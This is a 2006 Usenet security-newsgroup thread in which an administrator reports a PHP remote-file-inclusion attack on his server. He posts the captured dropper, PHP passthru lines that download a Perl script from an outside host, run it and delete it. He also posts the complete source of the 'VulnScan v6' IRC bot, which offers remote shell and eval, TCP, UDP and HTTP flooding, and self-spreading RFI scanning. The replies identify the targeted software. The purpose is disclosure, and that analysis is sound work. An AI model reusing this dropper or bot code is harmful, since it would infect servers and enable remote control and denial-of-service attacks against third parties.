f



PHP/Perl/Unix Virus: delete config.php files asap

There were some strange requests to my server asking for config.php
file (which I do not have in the requested location).

I did some investigation. Seems to be a virus written in perl,
exploiting a vulnerability in php code.

The requests are like this

216.120.231.252 - - [30/Aug/2006:13:28:03 -0500] "GET /algebra/about/history/config.php?returnpath=http://domates.1gig.biz/spread.txt? HTTP/1.1" 404 561 "-" "libwww-perl/5.805"

File spread.txt contains this:

<?
passthru('cd /tmp;wget http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;curl -O http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;lwp-download http://domates.1gig.biz/tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;lynx -source http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;fetch http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
passthru('cd /tmp;GET http://domates.1gig.biz/tmr >tmr;perl tmr;rm -f tmr*');
?>

That script, obviously, tries very hard to download and execute 'tmr'. 

'tmr' is, apparently, a perl script whose job SEEMS to be to listen on
IRC channels or some such and spread around by abusing a vulnerability
in 'config.php'. It is also seemingly used for DDOSing some servers
and who knows what else (shell function etc).

If the guy was smart, he's probably run some obfuscator on his code,
to make it harder to read.

I did a locate command on my fedora systems and found config.php in
some package called 'squirrelmail'. Which I immediately deleted, even
though it was not accessible through the web, just sitting there, but
I just do not want it.

My main question is, just what package or program owns config.php that
si vulnerable. It is a generic file name, so I would not be so quick
to suspect squirrelmail.

Here's the 'tmr' script:

#!/usr/bin/perl

# VulnScan v6 Stable By Morgan
# 
# Note:
# DO NOT REMOVE COPYRIGHTS ... 
# www.priv8.com.ar 
# 
# [Morgan]: http://priv8.com.ar/Zerocool.jpg
# [Morgan]: u got owned
# [ZEROCOOL]: bro
# [ZEROCOOL]: it's a rbot
# [ZEROCOOL]: i'm not fuckingstupid
# [ZEROCOOL]: uahuahuahuahua
#
#
# Greets to irc.gigachat.net :: #Morgan
# 
#
# To work with auto-spread : 
# Create a file named spread.txt with this : 
#
# <?
# passthru('cd /tmp;wget http://priv8.com.ar/v6;perl v6;rm -f v6*');
# passthru('cd /tmp;curl -O http://priv8.com.ar/v6;perl v6;rm -f v6*');
# passthru('cd /tmp;lwp-download http://priv8.com.ar/v6;perl v6.txt;rm -f v6*');
# passthru('cd /tmp;lynx -source http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# passthru('cd /tmp;fetch http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# passthru('cd /tmp;GET http://priv8.com.ar/v6 >v6;perl v6;rm -f v6*');
# ?>
#
# Change the url .. put ur bot url in that file 
# then use the command :
#
# !morgan !eval @cmdstring='http://yoursite.com/spread.txt';
# or directly change it from the code.. 
#
# Enjoy the bot ....
# /Morgan


my $processo = '[sys]';
use HTTP::Request;
use LWP::UserAgent;

#CONFIGURATION
my $linas_max='4';
my $sleep='5';
my @gstring='www.priv8.com.ar';
my @cmdstring='http://domates.1gig.biz/spread.txt';
my @adms=("h1dd3n","Tamer");
my @canais=("#tamerlinux");
my $nick='Linux-';
my $ircname ='linux';
chop (my $realname = `uname -a`);
$servidor='h1dd3n.pikolata.net' unless $servidor;
my $porta='6121';
my $VERSAO = 'Vulnscan v6 www.priv8.com.ar';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);


our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();

$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
  } else {
      print $IRC_cur_socket "$_[0]\n";
  }
}
# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan
sub conectar {
   my $meunick = $_[0];
   my $servidor_con = $_[1];
   my $porta_con = $_[2];

   my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
   if (defined($IRC_socket)) {
     $IRC_cur_socket = $IRC_socket;

     $IRC_socket->autoflush(1);
     $sel_cliente->add($IRC_socket);

     $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
     $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
     $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
     $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
     nick("$meunick");
     sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
     sleep 1;
   }
}
my $line_temp;
while( 1 ) {
   while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
   delete($irc_servers{''}) if (defined($irc_servers{''}));
   my @ready = $sel_cliente->can_read(0);
   next unless(@ready);
   foreach $fh (@ready) {
     $IRC_cur_socket = $fh;
     $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
     $nread = sysread($fh, $msg, 4096);
     if ($nread == 0) {
        $sel_cliente->remove($fh);
        $fh->close;
        delete($irc_servers{$fh});
     }
     @lines = split (/\n/, $msg);

     for(my $c=0; $c<= $#lines; $c++) {
       $line = $lines[$c];
       $line=$line_temp.$line if ($line_temp);
       $line_temp='';
       $line =~ s/\r$//;
       unless ($c == $#lines) {
         parse("$line");
       } else {
           if ($#lines == 0) {
             parse("$line");
           } elsif ($lines[$c] =~ /\r$/) {
               parse("$line");
           } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
               parse("$line");
           } else {
               $line_temp = $line;
           }
       }
      }
   }
}

sub parse {
   my $servarg = shift;
   if ($servarg =~ /^PING \:(.*)/) {
     sendraw("PONG :$1");
   } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
       my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
       if ($args =~ /^\001VERSION\001$/) {
         notice("$pn", "\001VERSION mIRC v6.16 Khaled Mardam-Bey\001");
       }
       if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
         if ($onde eq "$meunick"){
           shell("$pn", "$args");
         }
         if ($args =~ /^(\Q$meunick\E|\!say)\s+(.*)/ ) {
            my $natrix = $1;
            my $arg = $2;
            if ($arg =~ /^\!(.*)/) {
              ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
            } elsif ($arg =~ /^\@(.*)/) {
                $ondep = $onde;
                $ondep = $pn if $onde eq $meunick;
                bfunc("$ondep","$1");
            } else {
                shell("$onde", "$arg");
            }
         }
       }
}
    elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
       if (lc($1) eq lc($meunick)) {
         $meunick=$4;
         $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       }
   } elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
       nick("$meunick|".int rand(999999));
   } elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
       $meunick = $2;
       $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
       $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
       foreach my $canal (@canais) {
         sendraw("JOIN $canal ddosit");
       }
   }
}

# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan
sub bfunc {
  my $printl = $_[0];
  my $funcarg = $_[1];
  if (my $pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           if ($funcarg =~ /^portscan (.*)/) {
             my $hostip="$1";
             my @portas=("21","22","23","25","80","113","135","445","1025","5000","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");
             my (@aberta, %porta_banner);
     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Scanning ".$1." for open ports.");
             foreach my $porta (@portas)  {
                my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
                if ($scansock) {
                   push (@aberta, $porta);
                   $scansock->close;
                }
             }

             if (@aberta) {
               sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[SCAN]\002 Open port(s): @aberta");
             } else {
               sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[SCAN]\002 No open ports found");
             }
           }
           if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attacking ".$1.":".$2." for ".$3." seconds.");
     my $itime = time;
     my ($cur_time);
             $cur_time = time - $itime;
     while ($3>$cur_time){
             $cur_time = time - $itime;
     &tcpflooder("$1","$2","$3");
             }
     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[TCP DDoSing]\002 Attack done ".$1.":".$2.".");
           }
   if ($funcarg =~ /^version/) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[VERSION]\002 w0rmb0t ver ".$VERSAO);
}
#SCANNER 
           if ($funcarg =~ /^rfiscan\s+(\d+)\s+(.*)/) {
	     $boturl=$2;
   sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6]\002 Scan started.");
     srand;
     my $itime = time;
     my ($cur_time);
     my ($exploited);
	     $boturl=$2;
             $cur_time = time - $itime;$exploited = 0;
while($1>$cur_time){
    $cur_time = time - $itime;
    @urls=fetch();
foreach $url (@urls) {
$cur_time = time - $itime;
 #sendraw($IRC_cur_socket, "PRIVMSG #debug :\002[v6|Exploiting]\002 ".$url2."\n\n");
my $path = "";my $file = "";($path, $file) = $url =~ /^(.+)\/(.+)$/;
$url2 ="http://".$path."/".$boturl."@cmdstring?";

print "\n".$url2."\n\n";


# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan

my $req=HTTP::Request->new(GET=>$url2);
my $ua=LWP::UserAgent->new();
$ua->timeout(10);
my $response=$ua->request($req);

if ($response->is_success) {
 if( $response->content =~ /By/ && $response->content =~ /Morgan/ ){
 sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6|VULN]\002 ".$url2." \n\n");
}
}
else {
    print 'Errore: ',$path,$response->status_line, "\n";
}
 }
}
     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[v6]\002 Scan finished in ".$1." seconds.");
           }
           if ($funcarg =~ /^httpflood\s+(.*)\s+(\d+)/) {
     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP DDoSing]\002 Attacking ".$1.":80 for ".$2." seconds.");
     my $itime = time;
     my ($cur_time);
             $cur_time = time - $itime;
     while ($2>$cur_time){
             $cur_time = time - $itime;
     my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$1, PeerPort=>80);
             print $socket "GET / HTTP/1.1\r\nAccept: */*\r\nHost: ".$1."\r\nConnection: Keep-Alive\r\n\r\n";
     close($socket);
             }
     sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[HTTP]\002 Attacking done ".$1.".");
           }
           if ($funcarg =~ /^udpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP DDoSing]\002 Attacking ".$1." with ".$2." Kb packets for ".$3." seconds.");
             my ($dtime, %pacotes) = udpflooder("$1", "$2", "$3");
             $dtime = 1 if $dtime == 0;
             my %bytes;
             $bytes{igmp} = $2 * $pacotes{igmp};
             $bytes{icmp} = $2 * $pacotes{icmp};
             $bytes{o} = $2 * $pacotes{o};
             $bytes{udp} = $2 * $pacotes{udp};
             $bytes{tcp} = $2 * $pacotes{tcp};
             sendraw($IRC_cur_socket, "PRIVMSG $printl :\002[UDP]\002 Sent ".int(($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)." Kb in ".$dtime." seconds to ".$1.".");
           }
           exit;
       }
  }
}
# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan
sub ircase {
  my ($kem, $printl, $case) = @_;

  if ($case =~ /^join (.*)/) {
     j("$1");
   }
   if ($case =~ /^part (.*)/) {
      p("$1");
   }
   if ($case =~ /^rejoin\s+(.*)/) {
      my $chan = $1;
      if ($chan =~ /^(\d+) (.*)/) {
        for (my $ca = 1; $ca <= $1; $ca++ ) {
          p("$2");
          j("$2");
        }
      } else {
          p("$chan");
          j("$chan");
      }
   }
   if ($case =~ /^op/) {
      op("$printl", "$kem") if $case eq "op";
      my $oarg = substr($case, 3);
      op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^deop/) {
      deop("$printl", "$kem") if $case eq "deop";
      my $oarg = substr($case, 5);
      deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
   }
   if ($case =~ /^msg\s+(\S+) (.*)/) {
      msg("$1", "$2");
   }
   if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        msg("$2", "$3");
      }
   }
   if ($case =~ /^ctcp\s+(\S+) (.*)/) {
      ctcp("$1", "$2");
   }
   if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
      for (my $cf = 1; $cf <= $1; $cf++) {
        ctcp("$2", "$3");
      }
   }
   if ($case =~ /^nick (.*)/) {
      nick("$1");
   }
   if ($case =~ /^connect\s+(\S+)\s+(\S+)/) {
       conectar("$2", "$1", 6667);
   }
   if ($case =~ /^raw (.*)/) {
      sendraw("$1");
   }
   if ($case =~ /^eval (.*)/) {
     eval "$1";
   }
}
# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan
sub shell {
  my $printl=$_[0];
  my $comando=$_[1];
  if ($comando =~ /cd (.*)/) {
    chdir("$1") || msg("$printl", "No such file or directory");
    return;
  }
  elsif ($pid = fork) {
     waitpid($pid, 0);
  } else {
      if (fork) {
         exit;
       } else {
           my @resp=`$comando 2>&1 3>&1`;
           my $c=0;
           foreach my $linha (@resp) {
             $c++;
             chop $linha;
             sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
             if ($c == "$linas_max") {
               $c=0;
               sleep $sleep;
             }
           }
           exit;
       }
  }
}
# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan
sub tcpflooder {
 my $itime = time;
 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}
# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan
sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;

  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
 }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(10)) * $n);
{
my @dominios = ("nodom");
my @str;

foreach $dom  (@dominios)
{
	push (@str,"@gstring");
}

    my $query="www.google.com/search?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";
    my @lst=();
#sendraw("privmsg #Morgan :DEBUG only test googling: ".$query.""); 
    my $page = http_query($query);
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
    push (@lst,$1);
}
    }
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
    };

   return $page;
}
}
# V6 OWNED YOUR BOX 
# www.priv8.com.ar
# irc.gigachat.net - #Morgan

# NOTE: DONT REMOVE COPYRIGHTS

0
Ignoramus6539
8/30/2006 6:51:26 PM
comp.security.unix 708 articles. 0 followers. Post Follow

4 Replies
853 Views

Similar Articles

[PageSpeed] 14

Ignoramus6539 wrote:

> There were some strange requests to my server asking for config.php
> file (which I do not have in the requested location).
> 

Nice one Ignoramus6539

> I did some investigation. Seems to be a virus written in perl,
> exploiting a vulnerability in php code.
>

Sure looks like it. Is anyone daft enough to include($get_parameter)?

> I did a locate command on my fedora systems and found config.php in
> some package called 'squirrelmail'. Which I immediately deleted, even
> though it was not accessible through the web, just sitting there, but
> I just do not want it.
>
Oooh. "Some package called...' sloppy housekeeping!

Actually, although Squirrelmail was vulnerable to this kind of attack 
(http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
the developers are relatively good about releasing fixes.

Your attacker seems to be looking for phpListPro
(http://www.frsirt.com/english/advisories/2006/1325).

Usually script kiddies don't look to see what you're running before
unleashing all their dogs on your servers.
 
> My main question is, just what package or program owns config.php that
> si vulnerable. It is a generic file name, so I would not be so quick
> to suspect squirrelmail.
> 
Next time try Google first :) and give us a URL for the code.

C.

0
Colin
8/30/2006 7:45:54 PM
On Wed, 30 Aug 2006 19:45:54 GMT, Colin McKinnon <colin.thisisnotmysurname@ntlworld.deletemeunlessURaBot.com> wrote:
> Ignoramus6539 wrote:
>
>> There were some strange requests to my server asking for config.php
>> file (which I do not have in the requested location).
>> 
>
> Nice one Ignoramus6539
>
>> I did some investigation. Seems to be a virus written in perl,
>> exploiting a vulnerability in php code.
>>
>
> Sure looks like it. Is anyone daft enough to include($get_parameter)?

I think that the get parameter was mentioned in the access_log line.

>> I did a locate command on my fedora systems and found config.php in
>> some package called 'squirrelmail'. Which I immediately deleted, even
>> though it was not accessible through the web, just sitting there, but
>> I just do not want it.
>>
> Oooh. "Some package called...' sloppy housekeeping!

Yep. Point taken.

> Actually, although Squirrelmail was vulnerable to this kind of attack 
> (http://www.sans.org/resources/malwarefaq/squirrelmail.php?portal=750dd8d47b2e376b3699d19913a177c2,
> http://www.idefense.com/intelligence/vulnerabilities/display.php?id=191)
> the developers are relatively good about releasing fixes.
>
> Your attacker seems to be looking for phpListPro
> (http://www.frsirt.com/english/advisories/2006/1325).
>
> Usually script kiddies don't look to see what you're running before
> unleashing all their dogs on your servers.

Absolutely. They probably googled for some keywords on phpListPro and
found them under /algebra/about/history/ directory.

>> My main question is, just what package or program owns config.php that
>> si vulnerable. It is a generic file name, so I would not be so quick
>> to suspect squirrelmail.
>> 
> Next time try Google first :) and give us a URL for the code.

Well, I thought that the URLs might disappear soon. If you would like
me to place code on my own webpage, I will be glad to do so.

i

0
Ignoramus6539
8/30/2006 7:47:36 PM
Colin McKinnon wrote:

> Ignoramus6539 wrote:
> 
Whoops - sorry for cross-posting the reply too.

(rec.crafts.metalworking????)

C.
0
Colin
8/30/2006 8:22:50 PM
On Wed, 30 Aug 2006 20:22:50 GMT, Colin McKinnon
<colin.thisisnotmysurname@ntlworld.deletemeunlessURaBot.com> wrote:

>Whoops - sorry for cross-posting the reply too.
>
>(rec.crafts.metalworking????)

  S'Okay, mostly.  Leave it in, we might learn something.

  Igor hangs out in r.c.m all the time, and more than a few of the
people here are Linux Nerds as well as machinists.  ;-)  (I need to
learn it.)  So I guess he thinks it's relevant enough to crosspost it
here, and I for one will humor him on it.

     --<< Bruce >>--

0
8/31/2006 3:55:20 AM
Reply: